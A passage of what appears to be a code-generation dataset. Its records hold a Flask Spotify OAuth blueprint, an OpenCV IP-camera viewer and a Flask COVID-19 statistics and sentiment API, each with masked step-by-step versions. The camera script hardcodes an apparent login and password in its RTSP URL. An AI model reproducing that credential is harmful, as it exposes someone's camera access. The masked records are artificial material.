    """Decorator: refresh the Spotify session before invoking *view*.

    Redirects to ``home`` when no refresh token is present or when the
    Spotify API cannot be reached.
    """
    @functools.wraps(view)
    def wrapped_view(**kwargs):
        # Guard clause: without a refresh token the user is not logged in.
        if 'refresh' not in session:
            return redirect(url_for('home'))
        refreshed = SP_OAUTH.refresh_access_token(session['refresh'])
        session['token'] = refreshed['access_token']
        session['refresh'] = refreshed['refresh_token']
        sp = spotipy.Spotify(auth=session['token'])
        try:
            session['display_name'] = sp.current_user()['display_name']
        except SSLError:
            return redirect(url_for('home'))
        return view(**kwargs)

    return wrapped_view
|
flexible
|
{
"blob_id": "8f7ecbe03e9a7a1d9df8cbe4596456e21b84653b",
"index": 9114,
"step-1": "<mask token>\n\n\n@bp.route('/login')\ndef login():\n \"\"\"\n : Create session and login user\n : PARAMS None\n : RETURN <view>\n \"\"\"\n try:\n session.clear()\n return redirect(SP_OAUTH.get_authorize_url())\n except ConnectionError as e:\n flash('Connection error')\n\n\n@bp.route('/callback/')\ndef callback():\n \"\"\"\n : Redirect user after login\n : PARAMS None\n : RETURN <view>\n \"\"\"\n code = request.args.get('code')\n token = SP_OAUTH.get_access_token(code)\n if token:\n session['token'] = token['access_token']\n session['refresh'] = token['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError as e:\n return redirect(url_for('home'))\n else:\n flash('Cannot get access token')\n return redirect(url_for('home'))\n\n\n@bp.route('/logout')\ndef logout():\n \"\"\"\n : Clear session and log user out\n : PARAMS None\n : RETURN <view>\n \"\"\"\n session.clear()\n return redirect(url_for('home'))\n\n\ndef login_required(view):\n\n @functools.wraps(view)\n def wrapped_view(**kwargs):\n if 'refresh' in session:\n refresh = SP_OAUTH.refresh_access_token(session['refresh'])\n session['token'] = refresh['access_token']\n session['refresh'] = refresh['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError:\n return redirect(url_for('home'))\n return view(**kwargs)\n else:\n return redirect(url_for('home'))\n return wrapped_view\n",
"step-2": "<mask token>\nconfig.read('spotify.cfg')\n<mask token>\n\n\n@bp.route('/login')\ndef login():\n \"\"\"\n : Create session and login user\n : PARAMS None\n : RETURN <view>\n \"\"\"\n try:\n session.clear()\n return redirect(SP_OAUTH.get_authorize_url())\n except ConnectionError as e:\n flash('Connection error')\n\n\n@bp.route('/callback/')\ndef callback():\n \"\"\"\n : Redirect user after login\n : PARAMS None\n : RETURN <view>\n \"\"\"\n code = request.args.get('code')\n token = SP_OAUTH.get_access_token(code)\n if token:\n session['token'] = token['access_token']\n session['refresh'] = token['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError as e:\n return redirect(url_for('home'))\n else:\n flash('Cannot get access token')\n return redirect(url_for('home'))\n\n\n@bp.route('/logout')\ndef logout():\n \"\"\"\n : Clear session and log user out\n : PARAMS None\n : RETURN <view>\n \"\"\"\n session.clear()\n return redirect(url_for('home'))\n\n\ndef login_required(view):\n\n @functools.wraps(view)\n def wrapped_view(**kwargs):\n if 'refresh' in session:\n refresh = SP_OAUTH.refresh_access_token(session['refresh'])\n session['token'] = refresh['access_token']\n session['refresh'] = refresh['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError:\n return redirect(url_for('home'))\n return view(**kwargs)\n else:\n return redirect(url_for('home'))\n return wrapped_view\n",
"step-3": "<mask token>\nbp = Blueprint('auth', __name__, url_prefix='/auth')\nconfig = ConfigParser()\nconfig.read('spotify.cfg')\nCLIENT_ID = config.get('SPOTIFY', 'CLIENT_ID').strip(\"'\")\nCLIENT_SECRET = config.get('SPOTIFY', 'CLIENT_SECRET').strip(\"'\")\nREDIRECT_URI = config.get('SPOTIFY', 'REDIRECT_URI').strip(\"'\")\nSCOPE = 'user-read-currently-playing user-library-read playlist-read-private'\nSP_OAUTH = oauth2.SpotifyOAuth(CLIENT_ID, CLIENT_SECRET, REDIRECT_URI,\n scope=SCOPE)\n\n\n@bp.route('/login')\ndef login():\n \"\"\"\n : Create session and login user\n : PARAMS None\n : RETURN <view>\n \"\"\"\n try:\n session.clear()\n return redirect(SP_OAUTH.get_authorize_url())\n except ConnectionError as e:\n flash('Connection error')\n\n\n@bp.route('/callback/')\ndef callback():\n \"\"\"\n : Redirect user after login\n : PARAMS None\n : RETURN <view>\n \"\"\"\n code = request.args.get('code')\n token = SP_OAUTH.get_access_token(code)\n if token:\n session['token'] = token['access_token']\n session['refresh'] = token['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError as e:\n return redirect(url_for('home'))\n else:\n flash('Cannot get access token')\n return redirect(url_for('home'))\n\n\n@bp.route('/logout')\ndef logout():\n \"\"\"\n : Clear session and log user out\n : PARAMS None\n : RETURN <view>\n \"\"\"\n session.clear()\n return redirect(url_for('home'))\n\n\ndef login_required(view):\n\n @functools.wraps(view)\n def wrapped_view(**kwargs):\n if 'refresh' in session:\n refresh = SP_OAUTH.refresh_access_token(session['refresh'])\n session['token'] = refresh['access_token']\n session['refresh'] = refresh['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError:\n return redirect(url_for('home'))\n return view(**kwargs)\n else:\n return 
redirect(url_for('home'))\n return wrapped_view\n",
"step-4": "from base64 import b64encode\nfrom configparser import ConfigParser\nimport functools\nfrom flask import Blueprint, flash, redirect, render_template, request, session, url_for, app\nfrom requests.exceptions import SSLError\nimport spotipy\nfrom spotipy import oauth2\nbp = Blueprint('auth', __name__, url_prefix='/auth')\nconfig = ConfigParser()\nconfig.read('spotify.cfg')\nCLIENT_ID = config.get('SPOTIFY', 'CLIENT_ID').strip(\"'\")\nCLIENT_SECRET = config.get('SPOTIFY', 'CLIENT_SECRET').strip(\"'\")\nREDIRECT_URI = config.get('SPOTIFY', 'REDIRECT_URI').strip(\"'\")\nSCOPE = 'user-read-currently-playing user-library-read playlist-read-private'\nSP_OAUTH = oauth2.SpotifyOAuth(CLIENT_ID, CLIENT_SECRET, REDIRECT_URI,\n scope=SCOPE)\n\n\n@bp.route('/login')\ndef login():\n \"\"\"\n : Create session and login user\n : PARAMS None\n : RETURN <view>\n \"\"\"\n try:\n session.clear()\n return redirect(SP_OAUTH.get_authorize_url())\n except ConnectionError as e:\n flash('Connection error')\n\n\n@bp.route('/callback/')\ndef callback():\n \"\"\"\n : Redirect user after login\n : PARAMS None\n : RETURN <view>\n \"\"\"\n code = request.args.get('code')\n token = SP_OAUTH.get_access_token(code)\n if token:\n session['token'] = token['access_token']\n session['refresh'] = token['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError as e:\n return redirect(url_for('home'))\n else:\n flash('Cannot get access token')\n return redirect(url_for('home'))\n\n\n@bp.route('/logout')\ndef logout():\n \"\"\"\n : Clear session and log user out\n : PARAMS None\n : RETURN <view>\n \"\"\"\n session.clear()\n return redirect(url_for('home'))\n\n\ndef login_required(view):\n\n @functools.wraps(view)\n def wrapped_view(**kwargs):\n if 'refresh' in session:\n refresh = SP_OAUTH.refresh_access_token(session['refresh'])\n session['token'] = refresh['access_token']\n session['refresh'] = 
refresh['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError:\n return redirect(url_for('home'))\n return view(**kwargs)\n else:\n return redirect(url_for('home'))\n return wrapped_view\n",
"step-5": "from base64 import b64encode\nfrom configparser import ConfigParser\nimport functools\nfrom flask import (\n Blueprint, flash, redirect, render_template, request, session, url_for, app\n)\nfrom requests.exceptions import SSLError\nimport spotipy\nfrom spotipy import oauth2\n\nbp = Blueprint('auth', __name__, url_prefix='/auth')\nconfig = ConfigParser()\nconfig.read('spotify.cfg')\nCLIENT_ID = config.get('SPOTIFY', 'CLIENT_ID').strip(\"'\")\nCLIENT_SECRET = config.get('SPOTIFY', 'CLIENT_SECRET').strip(\"'\")\nREDIRECT_URI = config.get('SPOTIFY', 'REDIRECT_URI').strip(\"'\")\nSCOPE = 'user-read-currently-playing user-library-read playlist-read-private'\nSP_OAUTH = oauth2.SpotifyOAuth(CLIENT_ID, CLIENT_SECRET, REDIRECT_URI, scope=SCOPE)\n\n\n@bp.route('/login')\ndef login():\n '''\n : Create session and login user\n : PARAMS None\n : RETURN <view>\n '''\n try:\n session.clear()\n return redirect(SP_OAUTH.get_authorize_url())\n except ConnectionError as e:\n flash(\"Connection error\")\n\n\n@bp.route('/callback/')\ndef callback():\n '''\n : Redirect user after login\n : PARAMS None\n : RETURN <view>\n '''\n code = request.args.get('code')\n token = SP_OAUTH.get_access_token(code)\n if token:\n session['token'] = token['access_token']\n session['refresh'] = token['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError as e:\n # flash(\"Connection error\")\n return redirect(url_for('home'))\n else:\n flash(\"Cannot get access token\")\n return redirect(url_for('home'))\n\n@bp.route('/logout')\ndef logout():\n '''\n : Clear session and log user out\n : PARAMS None\n : RETURN <view>\n '''\n session.clear()\n return redirect(url_for('home'))\n\ndef login_required(view):\n @functools.wraps(view)\n def wrapped_view(**kwargs):\n\n if 'refresh' in session:\n refresh = SP_OAUTH.refresh_access_token(session['refresh'])\n session['token'] = refresh['access_token']\n 
session['refresh'] = refresh['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError:\n # flash(\"Connection error - please try again.\")\n return redirect(url_for('home'))\n return view(**kwargs)\n else:\n return redirect(url_for('home'))\n\n return wrapped_view\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
"""Access IP Camera in Python OpenCV"""
import cv2
#stream = cv2.VideoCapture('protocol://IP:port/1')
# Use the next line if your camera has a username and password
stream = cv2.VideoCapture('rtsp://SeniorDesign:1Hwe2Dxy@10.9.27.28:554/video')
while True:
r, f = stream.read()
cv2.imshow('IP Camera stream',f)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cv2.destroyAllWindows()
|
normal
|
{
"blob_id": "f9db3c96bc3fd4911640d0428672c87072564b0d",
"index": 710,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n r, f = stream.read()\n cv2.imshow('IP Camera stream', f)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\ncv2.destroyAllWindows()\n",
"step-3": "<mask token>\nstream = cv2.VideoCapture('rtsp://SeniorDesign:1Hwe2Dxy@10.9.27.28:554/video')\nwhile True:\n r, f = stream.read()\n cv2.imshow('IP Camera stream', f)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\ncv2.destroyAllWindows()\n",
"step-4": "<mask token>\nimport cv2\nstream = cv2.VideoCapture('rtsp://SeniorDesign:1Hwe2Dxy@10.9.27.28:554/video')\nwhile True:\n r, f = stream.read()\n cv2.imshow('IP Camera stream', f)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\ncv2.destroyAllWindows()\n",
"step-5": "\"\"\"Access IP Camera in Python OpenCV\"\"\"\r\n\r\nimport cv2\r\n\r\n#stream = cv2.VideoCapture('protocol://IP:port/1')\r\n\r\n# Use the next line if your camera has a username and password\r\nstream = cv2.VideoCapture('rtsp://SeniorDesign:1Hwe2Dxy@10.9.27.28:554/video') \r\n\r\nwhile True:\r\n\r\n r, f = stream.read()\r\n cv2.imshow('IP Camera stream',f)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\ncv2.destroyAllWindows()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
@app.route('/visualisation/confirmed/<string:country>')
@cross_origin()
def confirmedCases(country):
array = dataEx.getData('Confirmed', country).tolist()
return jsonify({'confirmed': array})
@app.route('/visualisation/recovered/<string:country>')
@cross_origin()
def recoveredCases(country):
array = dataEx.getData('Recovered', country).tolist()
return jsonify({'recovered': array})
<|reserved_special_token_0|>
@app.route('/visualisation/maxofall/<string:country>')
@cross_origin()
def maxofall(country):
array = dataEx.getMaxOfAll(country).tolist()
return jsonify({'confirmed': array[0], 'recovered': array[1], 'death':
array[2]})
@app.route('/visualisation/newdata/<string:country>')
@cross_origin()
def NewData(country):
array = dataEx.getNewData(country)[0]
lastUpdate = dataEx.getNewData(country)[1]
return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':
array[2], 'lastUpdate': lastUpdate})
@app.route('/visualisation/regionsData')
@cross_origin()
def dataByregion():
array = dataEx.getRegionsData()
return jsonify({'regions': array[0], 'affectedNum': array[1], 'update':
array[2], 'somme': array[3]})
@app.route('/visualisation/StatistiqueMonde')
@cross_origin()
def getStatistiqueMonde():
array = dataEx.getStatistiqueMonde()
return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':
array[2]})
@app.route('/visualisation/clusterAge')
@cross_origin()
def getClusterAge():
array = dataEx.getDataClusterAge()
return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),
'y': array[2].tolist(), 'cluster': array[3].tolist()})
@app.route('/visualisation/clusterTest')
@cross_origin()
def getClusterTest():
array = dataEx.getDataClusterTest()
print(array)
return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),
'y': array[2].tolist(), 'cluster': array[3].tolist()})
@app.route('/visualisation/ageClusterMean')
@cross_origin()
def getMeanClusterAge():
array = dataEx.getDataClusterAge()[4]
print(array)
return jsonify({'meanClusters': array.tolist()})
@app.route('/visualisation/testClusterMean')
@cross_origin()
def getMeanClusterTest():
array = dataEx.getDataClusterTest()[4]
return jsonify({'meanClusters': array.tolist()})
@app.route('/analysesentiment/covid19/', defaults={'tags': '#covid19',
'tags2': ''})
@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')
@cross_origin()
def analyseSentiment(tags, tags2):
array = twitterDataExtaraction(tags, tags2)
return jsonify({'neutral': array[0], 'negative': array[1], 'positive':
array[2]})
@app.route('/mongodb/nature')
@cross_origin()
def getNature():
cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/economy')
@cross_origin()
def getEconomy():
cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/mentalhealth')
@cross_origin()
def getMentalhealth():
cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}
) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/politics')
@cross_origin()
def getPolitics():
cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/visualisation/clusteringAge')
@cross_origin()
def getClusteringAge():
app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({
}) - 1)
return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],
'y': array[0]['y'], 'cluster': array[0]['cluster']})
@app.route('/visualisation/clusteringTest')
@cross_origin()
def getClusteringTest():
app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringTest.find().skip(db.clusteringTest.count_documents
({}) - 1)
return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],
'y': array[0]['y'], 'cluster': array[0]['cluster']})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/visualisation/confirmed/<string:country>')
@cross_origin()
def confirmedCases(country):
array = dataEx.getData('Confirmed', country).tolist()
return jsonify({'confirmed': array})
@app.route('/visualisation/recovered/<string:country>')
@cross_origin()
def recoveredCases(country):
array = dataEx.getData('Recovered', country).tolist()
return jsonify({'recovered': array})
@app.route('/visualisation/death/<string:country>')
@cross_origin()
def deathCases(country):
array = dataEx.getData('Deaths', country).tolist()
return jsonify({'deaths': array})
@app.route('/visualisation/maxofall/<string:country>')
@cross_origin()
def maxofall(country):
array = dataEx.getMaxOfAll(country).tolist()
return jsonify({'confirmed': array[0], 'recovered': array[1], 'death':
array[2]})
@app.route('/visualisation/newdata/<string:country>')
@cross_origin()
def NewData(country):
array = dataEx.getNewData(country)[0]
lastUpdate = dataEx.getNewData(country)[1]
return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':
array[2], 'lastUpdate': lastUpdate})
@app.route('/visualisation/regionsData')
@cross_origin()
def dataByregion():
array = dataEx.getRegionsData()
return jsonify({'regions': array[0], 'affectedNum': array[1], 'update':
array[2], 'somme': array[3]})
@app.route('/visualisation/StatistiqueMonde')
@cross_origin()
def getStatistiqueMonde():
array = dataEx.getStatistiqueMonde()
return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':
array[2]})
@app.route('/visualisation/clusterAge')
@cross_origin()
def getClusterAge():
array = dataEx.getDataClusterAge()
return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),
'y': array[2].tolist(), 'cluster': array[3].tolist()})
@app.route('/visualisation/clusterTest')
@cross_origin()
def getClusterTest():
array = dataEx.getDataClusterTest()
print(array)
return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),
'y': array[2].tolist(), 'cluster': array[3].tolist()})
@app.route('/visualisation/ageClusterMean')
@cross_origin()
def getMeanClusterAge():
array = dataEx.getDataClusterAge()[4]
print(array)
return jsonify({'meanClusters': array.tolist()})
@app.route('/visualisation/testClusterMean')
@cross_origin()
def getMeanClusterTest():
array = dataEx.getDataClusterTest()[4]
return jsonify({'meanClusters': array.tolist()})
@app.route('/analysesentiment/covid19/', defaults={'tags': '#covid19',
'tags2': ''})
@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')
@cross_origin()
def analyseSentiment(tags, tags2):
array = twitterDataExtaraction(tags, tags2)
return jsonify({'neutral': array[0], 'negative': array[1], 'positive':
array[2]})
@app.route('/mongodb/nature')
@cross_origin()
def getNature():
cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/economy')
@cross_origin()
def getEconomy():
cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/mentalhealth')
@cross_origin()
def getMentalhealth():
cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}
) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/politics')
@cross_origin()
def getPolitics():
cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/visualisation/clusteringAge')
@cross_origin()
def getClusteringAge():
app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({
}) - 1)
return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],
'y': array[0]['y'], 'cluster': array[0]['cluster']})
@app.route('/visualisation/clusteringTest')
@cross_origin()
def getClusteringTest():
app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringTest.find().skip(db.clusteringTest.count_documents
({}) - 1)
return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],
'y': array[0]['y'], 'cluster': array[0]['cluster']})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/visualisation/confirmed/<string:country>')
@cross_origin()
def confirmedCases(country):
array = dataEx.getData('Confirmed', country).tolist()
return jsonify({'confirmed': array})
@app.route('/visualisation/recovered/<string:country>')
@cross_origin()
def recoveredCases(country):
array = dataEx.getData('Recovered', country).tolist()
return jsonify({'recovered': array})
@app.route('/visualisation/death/<string:country>')
@cross_origin()
def deathCases(country):
array = dataEx.getData('Deaths', country).tolist()
return jsonify({'deaths': array})
@app.route('/visualisation/maxofall/<string:country>')
@cross_origin()
def maxofall(country):
array = dataEx.getMaxOfAll(country).tolist()
return jsonify({'confirmed': array[0], 'recovered': array[1], 'death':
array[2]})
@app.route('/visualisation/newdata/<string:country>')
@cross_origin()
def NewData(country):
array = dataEx.getNewData(country)[0]
lastUpdate = dataEx.getNewData(country)[1]
return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':
array[2], 'lastUpdate': lastUpdate})
@app.route('/visualisation/regionsData')
@cross_origin()
def dataByregion():
array = dataEx.getRegionsData()
return jsonify({'regions': array[0], 'affectedNum': array[1], 'update':
array[2], 'somme': array[3]})
@app.route('/visualisation/StatistiqueMonde')
@cross_origin()
def getStatistiqueMonde():
array = dataEx.getStatistiqueMonde()
return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':
array[2]})
@app.route('/visualisation/clusterAge')
@cross_origin()
def getClusterAge():
array = dataEx.getDataClusterAge()
return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),
'y': array[2].tolist(), 'cluster': array[3].tolist()})
@app.route('/visualisation/clusterTest')
@cross_origin()
def getClusterTest():
array = dataEx.getDataClusterTest()
print(array)
return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),
'y': array[2].tolist(), 'cluster': array[3].tolist()})
@app.route('/visualisation/ageClusterMean')
@cross_origin()
def getMeanClusterAge():
array = dataEx.getDataClusterAge()[4]
print(array)
return jsonify({'meanClusters': array.tolist()})
@app.route('/visualisation/testClusterMean')
@cross_origin()
def getMeanClusterTest():
array = dataEx.getDataClusterTest()[4]
return jsonify({'meanClusters': array.tolist()})
@app.route('/analysesentiment/covid19/', defaults={'tags': '#covid19',
'tags2': ''})
@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')
@cross_origin()
def analyseSentiment(tags, tags2):
array = twitterDataExtaraction(tags, tags2)
return jsonify({'neutral': array[0], 'negative': array[1], 'positive':
array[2]})
@app.route('/mongodb/nature')
@cross_origin()
def getNature():
cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/economy')
@cross_origin()
def getEconomy():
cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/mentalhealth')
@cross_origin()
def getMentalhealth():
cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}
) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/politics')
@cross_origin()
def getPolitics():
cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/visualisation/clusteringAge')
@cross_origin()
def getClusteringAge():
app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({
}) - 1)
return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],
'y': array[0]['y'], 'cluster': array[0]['cluster']})
@app.route('/visualisation/clusteringTest')
@cross_origin()
def getClusteringTest():
app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringTest.find().skip(db.clusteringTest.count_documents
({}) - 1)
return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],
'y': array[0]['y'], 'cluster': array[0]['cluster']})
if __name__ == '__main__':
app.run(debug=True)
<|reserved_special_token_1|>
from flask import Flask, jsonify
import dataExtraction as dataEx
from flask_cors import CORS, cross_origin
from analyseSentiment import twitterDataExtaraction
from flask_pymongo import PyMongo
app = Flask(__name__)
app.config['MONGO_URI'] = 'mongodb://localhost:27017/scrapingDB'
mongo = PyMongo(app)
db = mongo.db
cors = CORS(app, resources={'/api/*': {'origins': '*'}})
@app.route('/visualisation/confirmed/<string:country>')
@cross_origin()
def confirmedCases(country):
array = dataEx.getData('Confirmed', country).tolist()
return jsonify({'confirmed': array})
@app.route('/visualisation/recovered/<string:country>')
@cross_origin()
def recoveredCases(country):
array = dataEx.getData('Recovered', country).tolist()
return jsonify({'recovered': array})
@app.route('/visualisation/death/<string:country>')
@cross_origin()
def deathCases(country):
array = dataEx.getData('Deaths', country).tolist()
return jsonify({'deaths': array})
@app.route('/visualisation/maxofall/<string:country>')
@cross_origin()
def maxofall(country):
array = dataEx.getMaxOfAll(country).tolist()
return jsonify({'confirmed': array[0], 'recovered': array[1], 'death':
array[2]})
@app.route('/visualisation/newdata/<string:country>')
@cross_origin()
def NewData(country):
array = dataEx.getNewData(country)[0]
lastUpdate = dataEx.getNewData(country)[1]
return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':
array[2], 'lastUpdate': lastUpdate})
@app.route('/visualisation/regionsData')
@cross_origin()
def dataByregion():
array = dataEx.getRegionsData()
return jsonify({'regions': array[0], 'affectedNum': array[1], 'update':
array[2], 'somme': array[3]})
@app.route('/visualisation/StatistiqueMonde')
@cross_origin()
def getStatistiqueMonde():
array = dataEx.getStatistiqueMonde()
return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':
array[2]})
@app.route('/visualisation/clusterAge')
@cross_origin()
def getClusterAge():
array = dataEx.getDataClusterAge()
return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),
'y': array[2].tolist(), 'cluster': array[3].tolist()})
@app.route('/visualisation/clusterTest')
@cross_origin()
def getClusterTest():
array = dataEx.getDataClusterTest()
print(array)
return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),
'y': array[2].tolist(), 'cluster': array[3].tolist()})
@app.route('/visualisation/ageClusterMean')
@cross_origin()
def getMeanClusterAge():
array = dataEx.getDataClusterAge()[4]
print(array)
return jsonify({'meanClusters': array.tolist()})
@app.route('/visualisation/testClusterMean')
@cross_origin()
def getMeanClusterTest():
array = dataEx.getDataClusterTest()[4]
return jsonify({'meanClusters': array.tolist()})
@app.route('/analysesentiment/covid19/', defaults={'tags': '#covid19',
'tags2': ''})
@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')
@cross_origin()
def analyseSentiment(tags, tags2):
array = twitterDataExtaraction(tags, tags2)
return jsonify({'neutral': array[0], 'negative': array[1], 'positive':
array[2]})
@app.route('/mongodb/nature')
@cross_origin()
def getNature():
cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/economy')
@cross_origin()
def getEconomy():
cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/mentalhealth')
@cross_origin()
def getMentalhealth():
cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}
) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/politics')
@cross_origin()
def getPolitics():
cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/visualisation/clusteringAge')
@cross_origin()
def getClusteringAge():
app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({
}) - 1)
return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],
'y': array[0]['y'], 'cluster': array[0]['cluster']})
@app.route('/visualisation/clusteringTest')
@cross_origin()
def getClusteringTest():
app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringTest.find().skip(db.clusteringTest.count_documents
({}) - 1)
return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],
'y': array[0]['y'], 'cluster': array[0]['cluster']})
if __name__ == '__main__':
app.run(debug=True)
<|reserved_special_token_1|>
from flask import Flask, jsonify
import dataExtraction as dataEx
from flask_cors import CORS,cross_origin
from analyseSentiment import twitterDataExtaraction
from flask_pymongo import PyMongo
# Flask application serving COVID-19 visualisation and sentiment endpoints.
app = Flask(__name__)
# Primary MongoDB connection: sentiment documents live in scrapingDB.
app.config["MONGO_URI"] = "mongodb://localhost:27017/scrapingDB"
mongo = PyMongo(app)
db = mongo.db
# Allow cross-origin requests so a separately-hosted front-end can call the API.
cors = CORS(app, resources={r"/api/*": {"origins": "*"}})
# Visualisation service part
@app.route('/visualisation/confirmed/<string:country>')
@cross_origin()
def confirmedCases(country):
